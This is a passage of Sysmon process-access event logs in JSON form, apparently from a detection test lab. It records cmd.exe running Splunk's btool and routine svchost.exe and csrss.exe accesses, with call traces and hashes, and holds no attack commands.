AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010A0070500}","ParentProcessId":"1256","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010A0070500}\r\nSourceProcessId: 1256\r\nSourceThreadId: 1260\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00105C080500}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010A0070500}","SourceProcessId":"1256","SourceThreadId":"1260","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00105C080500}","TargetProcessId":"1320","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00105C080500}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00105C080500}","TargetProcessId":"1320","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 